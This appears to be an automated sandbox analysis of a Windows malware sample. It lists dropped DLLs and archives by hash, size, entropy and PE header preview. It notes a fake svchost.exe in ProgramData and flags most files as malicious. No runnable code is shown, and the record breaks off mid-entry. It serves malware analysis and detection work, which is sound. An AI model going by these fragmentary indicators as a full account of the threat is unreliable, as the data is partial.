                                                                                        Category:dropped
                                                                                        Size (bytes):100
                                                                                        Entropy (8bit):5.0203365408149025
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                                                        MD5:C48772FF6F9F408D7160FE9537E150E0
                                                                                        SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                                                        SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                                                        SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                                                        Malicious:false
                                                                                        Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):13
                                                                                        Entropy (8bit):3.2389012566026314
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:cOv:Nv
                                                                                        MD5:E7274BD06FF93210298E7117D11EA631
                                                                                        SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                        SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                        SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                        Malicious:false
                                                                                        Preview:cryptography.
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):7218176
                                                                                        Entropy (8bit):6.56234593155449
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:1CPfKk+AGdmA+xiIfIBE7S2ohqc/3J2y:gPfr3GdmAwjABE7S2ogiJ
                                                                                        MD5:12A7C0D35CCBD002150BB29DDD7E8440
                                                                                        SHA1:F16D9A4654DC76B3CFADA387FF7BDDDB0B18B79A
                                                                                        SHA-256:7E22D579AC503B959268964102C03D4E96C8A9B74186158B8C82FDC8CF9D9522
                                                                                        SHA-512:C9E5E68DE8F51F91CBBA839B4FECE1DB4DA7480890A6C7318A78DEAA30191FCB8913BA447F45D4AE93B986F3246F09F8CC721E781CE020110A3BB5628B3EF9F7
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.Fs..Fs..Fs..O...Ts.....Ds.....Ws.....Ns.....Bs..|...Ds..Fs..gq.....Ws..)...0p.....Gs..Fs...s.....Gs.....Gs..RichFs..........................PE..d....A.e.........." ...'.jS...........R.......................................n...........`.........................................`.h.p.....h.|............Pj..M............m......7c.T....................8c.(....6c.@.............S..............................text....hS......jS................. ..`.rdata........S......nS.............@..@.data....!... i.......i.............@....pdata...M...Pj..N....i.............@..@.reloc........m......Dm.............@..B................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3450648
                                                                                        Entropy (8bit):6.098075450035195
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                        MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                        SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                        SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                        SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32792
                                                                                        Entropy (8bit):6.3566777719925565
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                        MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                        SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                        SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                        SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                        Malicious:false
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):704792
                                                                                        Entropy (8bit):5.5573527806738126
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WhO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0TGqwfU2lvz2:2is/POtrzbLp5dQ0TGqcU2lvz2
                                                                                        MD5:BEC0F86F9DA765E2A02C9237259A7898
                                                                                        SHA1:3CAA604C3FFF88E71F489977E4293A488FB5671C
                                                                                        SHA-256:D74CE01319AE6F54483A19375524AA39D9F5FD91F06CF7DF238CA25E043130FD
                                                                                        SHA-512:FFBC4E5FFDB49704E7AA6D74533E5AF76BBE5DB297713D8E59BD296143FE5F145FBB616B343EED3C48ECEACCCCC2431630470D8975A4A17C37EAFCC12EDD19F4
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".D...T......<................................................i....`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):348672
                                                                                        Entropy (8bit):6.620074456825018
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:PS8ZHilzJNijWKvNpwNasFp2HX5l5XBMC+ZSHUV50DErV4c+:PSEilzJNijfpOSjDz
                                                                                        MD5:9D1B8BAD0E17E63B9D8E441CDC15BAEE
                                                                                        SHA1:0C5A62135B072D1951A9D6806B9EFF7AA9C897A3
                                                                                        SHA-256:D733C23C6A4B21625A4FF07F6562BA882BCBDB0F50826269419D8DE0574F88CD
                                                                                        SHA-512:49E7F6AB825D5047421641ED4618FF6CB2A8D22A8A4AE1BD8F2DEEFE7987D80C8E0ACC72B950D02214F7B41DC4A42DF73A7F5742EBC96670D1C5A28C47B97355
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................a.........................................................................r.............Rich............PE..d......a.........." .........@......P.....................................................`.............................................P............p.......P..(...............|...@...............................`...8............0...............................text...H........................... ..`.rdata.......0......................@..@.data....8.......2..................@....pdata..(....P.......,..............@..@.rsrc........p.......J..............@..@.reloc..|............L..............@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):198936
                                                                                        Entropy (8bit):6.372446720663998
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:13BAJzkk5dT6F62eqf2A3zVnjIHdAPKReewMP12yGUfT0+SYyWgOmrpjAxvwnVIq:FQg4dT6N5OA3zVnjNed4yGKTKR/
                                                                                        MD5:1118C1329F82CE9072D908CBD87E197C
                                                                                        SHA1:C59382178FE695C2C5576DCA47C96B6DE4BBCFFD
                                                                                        SHA-256:4A2D59993BCE76790C6D923AF81BF404F8E2CB73552E320113663B14CF78748C
                                                                                        SHA-512:29F1B74E96A95B0B777EF00448DA8BD0844E2F1D8248788A284EC868AE098C774A694D234A00BD991B2D22C2372C34F762CDBD9EC523234861E39C0CA752DCAA
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sn.Jsn.Jsn.Jz.:J.n.J!..Kqn.J!..K.n.J!..K{n.J!..Kpn.J...Kqn.J8..Kpn.Jsn.J.n.J...Kwn.J...Krn.J..VJrn.J...Krn.JRichsn.J................PE..d.....,d.........." ......................................................................`.........................................p...P................................/...........4..T...........................05..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):66328
                                                                                        Entropy (8bit):6.162953246481027
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:t68LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqn:t6wewnvtjnsfwxVILL0S7SyuPxHO
                                                                                        MD5:FD4A39E7C1F7F07CF635145A2AF0DC3A
                                                                                        SHA1:05292BA14ACC978BB195818499A294028AB644BD
                                                                                        SHA-256:DC909EB798A23BA8EE9F8E3F307D97755BC0D2DC0CB342CEDAE81FBBAD32A8A9
                                                                                        SHA-512:37D3218BC767C44E8197555D3FA18D5AAD43A536CFE24AC17BF8A3084FB70BD4763CCFD16D2DF405538B657F720871E0CD312DFEB7F592F3AAC34D9D00D5A643
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.d.A.d.A.d...l.@.d...d.@.d.....@.d...f.@.d.RichA.d.........PE..d.....,d.........." .................................................................x....`.........................................`...`................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):4458776
                                                                                        Entropy (8bit):6.460390021076921
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                        MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                        SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                        SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                        SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):29976
                                                                                        Entropy (8bit):6.627859470728624
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                        MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                        SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                        SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                        SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1016584
                                                                                        Entropy (8bit):6.669319438805479
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                        MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                        SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                        SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                        SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                        Malicious:false
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1123608
                                                                                        Entropy (8bit):5.3853088605790385
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                        MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                        SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                        SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                        SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36352
                                                                                        Entropy (8bit):5.307092802083391
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:frtPrRtr4IXhjSwZQ41tsSWEJwrhmf6mvgkoOIB/5k7jKWboNeMCKAODeNaoL5I1:f5br54WmB/aENyKAODhSoLkCpIk
                                                                                        MD5:7E65EFC6C3B12A403A110056141FF14E
                                                                                        SHA1:144845210FE97AF7D8570713BAE944CCBBD9BF16
                                                                                        SHA-256:8267AC2A59BA26CDAF4B347A8C92D26ACB1E261AFFFFE1D160F9153372363A64
                                                                                        SHA-512:3B37C27825CA85BF96E28BB2F7545A29BA595E19E8D78C9C1912CBC4EB7349CC3F9B52A466D0E7FB537E646AB2BB1F704D2B59389ABEA5F4C2733DA74F3A3380
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..^W..^W..^W..W/M.\W..K(..\W.../..\W..K(..UW..K(..VW..K(..]W.."..]W..^W...W..g..._W..g..._W..g.!._W..g..._W..Rich^W..........................PE..d....yLe.........." ...%.H...H.......M....................................................`..........................................r..d...tr..d...................................`k.............................. j..@............`...............................text....G.......H.................. ..`.rdata...!...`..."...L..............@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32972420
                                                                                        Entropy (8bit):7.999533007852075
                                                                                        Encrypted:true
                                                                                        SSDEEP:786432:ivIFT9qEz9FgYXhP8iFopWjUhcNrMzws9J:ivET0EJFg0RFypWQhcNrMEsD
                                                                                        MD5:B72CBBAF7F2E3E31E90944AC747798D3
                                                                                        SHA1:AFEA9F6DD9F56B470BA90C736A00BD5AFD58F48E
                                                                                        SHA-256:276A8E849C7DF0FEAE92DE095EA3EA515EB3E41C48DD326737D4E24E710899C3
                                                                                        SHA-512:4DD915848889A6DD2725F5CDEEA749FBD4DDD15348C298D45E82E7488BA81A866D3DBB25A35CEEB2524C72C8D46390B0BFA4A0334EACF75CAAB3E40F641D6098
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):119192
                                                                                        Entropy (8bit):6.6016214745004635
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                        MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                        SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                        SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                        SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):49432
                                                                                        Entropy (8bit):7.811017693834739
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lBEQ3cqbneddmWEADRew62fIYCVWZ7Symxs:lB53cqbn0YZaIYCVWZL
                                                                                        MD5:3BD0DD2ED98FCA486EC23C42A12978A8
                                                                                        SHA1:63DF559F4F1A96EB84028DC06EAEB0EF43551ACD
                                                                                        SHA-256:6BEB733F2E27D25617D880559299FBEBD6A9DAC51D6A9D0AB14AE6DF9877DA07
                                                                                        SHA-512:9FFA7DA0E57D98B8FD6B71BC5984118EA0B23BF11EA3F377DABB45B42F2C8757216BC38DDD05B50C0BC1C69C23754319CEF9FFC662D4199F7C7E038A0FB18254
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d...p..f.........." ...&............`d....................................................`.............................................H.................... ..,..................................................`p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):109848
                                                                                        Entropy (8bit):7.940033692006014
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:2cBkCziCnitddhSqZDd5jgejo8y04krK6p5DiIYOqgC9c:/ICiLzSCHjg95Zy9DHCK
                                                                                        MD5:8B623D42698BF8A7602243B4BE1F775D
                                                                                        SHA1:F9116F4786B5687A03C75D960150726843E1BC25
                                                                                        SHA-256:7C2F0A65E38179170DC69E1958E7D21E552ECA46FCF62BBB842B4F951A86156C
                                                                                        SHA-512:AA1B497629D7E57B960E4B0AB1EA3C28148E2D8EBD02905E89B365F508B945A49AACFBD032792101668A32F8666F8C4EF738DE7562979B7CF89E0211614FA21A
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...c..f.........." ...&.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36632
                                                                                        Entropy (8bit):7.6509624792548525
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:46bvUQL1bqnnrXTvDpovwIYOI7O5YiSyvPAAMxkEXm:3MQRbqnzSvwIYOI7k7Syuxrm
                                                                                        MD5:D71DF4F6E94BEA5E57C267395AD2A172
                                                                                        SHA1:5C82BCA6F2CE00C80E6FE885A651B404052AC7D0
                                                                                        SHA-256:8BC92B5A6C1E1C613027C8F639CD8F9F1218FC4F7D5526CFCB9C517A2E9E14C2
                                                                                        SHA-512:E794D9AE16F9A2B0C52E0F9C390D967BA3287523190D98279254126DB907BA0E5E87E5525560273798CC9F32640C33C8D9F825FF473524D91B664FE91E125549
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.@:.r.:.r.:.r.3c..>.r.<.s.8.r.<.w.6.r.<.v.2.r.<.q.9.r.U.s.8.r.qcs.8.r...s.9.r.:.s...r.U...;.r.U.r.;.r.U...;.r.U.p.;.r.Rich:.r.........PE..d......f.........." ...&.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):88344
                                                                                        Entropy (8bit):7.9169630929403905
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:hrahPO+MVHyw7e8z0RvFCbqZizJDhNvf2sAwwh0ZmHNzay0IYZ1dP7Syexg:dChw7ey0RvwqWDbvOfh0ZmmIYZ1dPf
                                                                                        MD5:932147AC29C593EB9E5244B67CF389BB
                                                                                        SHA1:3584FF40AB9AAC1E557A6A6009D10F6835052CDE
                                                                                        SHA-256:BDE9BCCB972D356B8DE2DC49A4D21D1B2F9711BBC53C9B9F678B66F16CA4C5D3
                                                                                        SHA-512:6E36B8D8C6DC57A0871F0087757749C843EE12800A451185856A959160F860402AA16821C4EA659EA43BE2C44FCDB4DF5C0F889C21440ACEB9EE1BC57373263C
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MR..MR..MR..D*..IR..K..OR..K..AR..K..ER..K..NR.."..NR...*..OR..MR..+R.."..wR.."..LR..".j.LR.."..LR..RichMR..........PE..d......f.........." ...&. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):44312
                                                                                        Entropy (8bit):7.700849446491776
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:MKyC5RumAPKm822kI+Ud/erhgTF0GTp0G3IYLwWFi5YiSyvlcAMxkE3:zyC5u25/eWGFG3IYLwWFA7Syt6xr
                                                                                        MD5:2957B2D82521ED0198851D12ED567746
                                                                                        SHA1:AD5FD781490EE9B1AD2DD03E74F0779FB5F9AFC2
                                                                                        SHA-256:1E97A62F4F768FA75BAC47BBA09928D79B74D84711B6488905F8429CD46F94A2
                                                                                        SHA-512:B557CF3FE6C0CC188C6ACC0A43B44F82FCF3A6454F6ED7A066D75DA21BB11E08CFA180699528C39B0075F4E79B0199BB05E57526E8617036411815AB9F406D35
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:!..~@..~@..~@..w8@.x@..x...|@..x...s@..x...v@..x...}@......|@..~@...@..58..y@.......@.......@....,..@.......@..Rich~@..........PE..d......f.........." ...&.p.......... m....................................................`.............................................P.......h............ ..x...........X.......................................0y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):1443565
                                                                                        Entropy (8bit):5.590585212949354
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfbM3AOwjwhBdmzRPFaUHHd:mQR5pE/RtQ/P
                                                                                        MD5:4B011F052728AE5007F9EC4E97A4F625
                                                                                        SHA1:9D940561F08104618EC9E901A9CD0CD13E8B355D
